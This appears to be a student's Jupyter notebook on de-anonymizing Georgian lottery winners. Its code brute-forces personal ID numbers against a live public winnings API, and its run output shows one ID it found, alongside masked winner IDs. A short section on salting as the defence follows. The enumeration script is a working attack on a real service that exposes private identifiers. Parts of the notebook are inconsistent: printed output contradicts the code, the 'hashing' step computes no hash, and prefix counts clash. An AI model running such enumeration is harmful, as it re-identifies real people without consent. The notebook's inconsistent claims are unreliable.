In [13]:
# Giorgi Alavidze, Feb 22
# The notebook includes the following:
# (1) "Optimal" brute force search
# (2) Hashing 
# (3) Short essay on why salted hashing defeats the brute force search from (1)
# (4) K-anonymized dataset 


In [14]:
import requests 
import json 
import pandas as pd
import itertools
import pandasql
import os
import matplotlib
import numpy as np 
import secrets
mil = 1_000_000  # one million

In [15]:
def open_csv(path='lottoproject.csv'):
    '''
    Load the lottery winners table from a CSV file.

    path - location of the CSV file; defaults to lottoproject.csv
           (file attached on github), so existing calls keep working.

    Returns a DataFrame without the file's first column, which is
    dropped as unwanted (presumably a saved index -- TODO confirm).
    '''
    df = pd.read_csv(path)
    return df.drop(columns=df.columns[0])  # get rid of the unwanted first column

In [16]:
def get_records_resource(pid, timeout=10):
    '''
    Query the public winnings endpoint for one personal id.

    pid     - personal id to look up; it is appended to the endpoint URL.
    timeout - seconds to wait for the server before requests raises a
              Timeout, so a stalled connection cannot hang a long scan.

    Returns the decoded JSON body of the response. The brute force
    search in this notebook treats a truthy result as "this id has won".
    '''
    base_url = 'https://stopcov-api.lotto.ge/Public/Winnings'
    url = base_url + '/' + str(pid)  # str() so a numeric id is accepted as well
    response = requests.get(url, timeout=timeout)
    return response.json()

In [17]:
# The following arrangements were taken from https://www.matsne.gov.ge/ka/document/view/59044?publication=0

# special cases
# NOTE(review): '66009' sits between '61008' and '61010' -- possibly a typo for '61009'; confirm against the source document.
first_five_digits_list = ['01001', '01005', '01008', '01011', '01015', '01017', '01019', '01024', '01027',
                          '01030', '61001', '61004', '61006', '61008', '66009', '61010', '62001', '62003', '62004',
                          '62005', '62006', '62007', '62011', '62013']

# Append the rest of the prefixes, which have the format 02001, 03001, ..., 60001.
# The number is zero-padded to two digits so that 2 becomes '02001'; building it as
# str(i) + '0001' gave '20001', which only duplicated the entry for 20.
rest_ = ['{0:02}001'.format(i) for i in range(2, 61)]

# NOTE(review): this yields 24 + 59 = 83 prefixes, while the write-up in this notebook counts 82 -- confirm which is right.
first_five_digits_list += rest_

In [18]:
def obtain_pid(prefix='50001'):
    '''
    Uses brute force search to identify winners.

    prefix - the first five digits of the personal ids to try; the
             default reproduces the original hard-coded search.

    Tries every six-digit suffix from 000000 to 999999 in order and stops
    at the first id for which get_records_resource returns a truthy
    result. That id is printed and saved to pid.txt. If nothing is found,
    pid.txt is left empty.
    '''
    # The with-block closes pid.txt even when a request raises part-way through the scan.
    with open('pid.txt', 'w') as file_:
        for i in range(999999 + 1):  # one million suffixes
            pid = '{0}{1:06}'.format(prefix, i)
            if get_records_resource(pid):
                print(pid)
                file_.write(pid + '\n')  # record the hit; the file was previously opened but never written
                break
    return


In [12]:
# Run the brute force search; every candidate id it tries is checked through get_records_resource.
obtain_pid()

50001000076


In [24]:
# Load the winners table and keep the personal ids whose first three characters are '500'.
df = open_csv()
pid = [masked_id for masked_id in df['personalId'] if masked_id[:3] == '500']
pid

['500-----180',
 '500-----977',
 '500-----467',
 '500-----268',
 '500-----058',
 '500-----156',
 '500-----451',
 '500-----301',
 '500-----008',
 '500-----654',
 '500-----933',
 '500-----302',
 '500-----958',
 '500-----076',
 '500-----528',
 '500-----390',
 '500-----614']

#### In our optimal brute force search, we use the government document (https://www.matsne.gov.ge/ka/document/view/59044?publication=0) that lists every possible combination of the first five digits of a personal ID number. All of these five-digit prefixes are stored in first_five_digits_list. A personal ID has 11 digits in total, and there are 82 possible five-digit prefixes. That leaves 6 unknown digits, i.e. 10^6 (one million) possible combinations per prefix. Thus, the brute force search works as follows:
#### Algorithm: for each five digit combination:
####                for i in range of 1 million:
####                    create a string s, where s = five digit combination + i (in {0:06} format, e.g. 000001 / 999999)
####                    send a GET request with string s to see whether that pid has won
####                    if it has, we have found a winner
####                    else, continue the iteration
#### Thus, in total, we will search over 82 * 10^6 (82 million) candidate IDs.
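##### Our other option would be to use the original dataset, which contains the first three and last three digits of each personal ID. Only the five middle digits would then be unknown, i.e. at most 10^5 candidates per record, so this is probably the cheaper approach (to be confirmed).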

### (2) Hashing



In [57]:
def encrypt_id(pid):
    '''
    Attach a random salt to a personal id.

    pid - the personal id, as a string.

    Returns pid followed by the decimal digits of a fresh random
    32-bit integer. No hash is computed here; the returned value is
    the salted string that would be hashed.
    '''
    salt_digits = format(secrets.randbits(32), 'd')
    return pid + salt_digits

pid = "01005031154"
print("We will be hashing",encrypt_id(pid), "where", pid, "is the personal id", "and the rest is the salt")

We will be hashing 010050311541670817265 where 01005031154 is the personal id and the rest is the salt 3712349228


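### (3) With the salt, an adversary who does not know it has to search over 82 * 10^6 * 2^32 (roughly 3.5 * 10^17) candidates instead of 82 * 10^6, because the salt is a random 32-bit number (up to 10 decimal digits).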

### (4) K-anonymized dataset (TODO: ask Dr. Truex)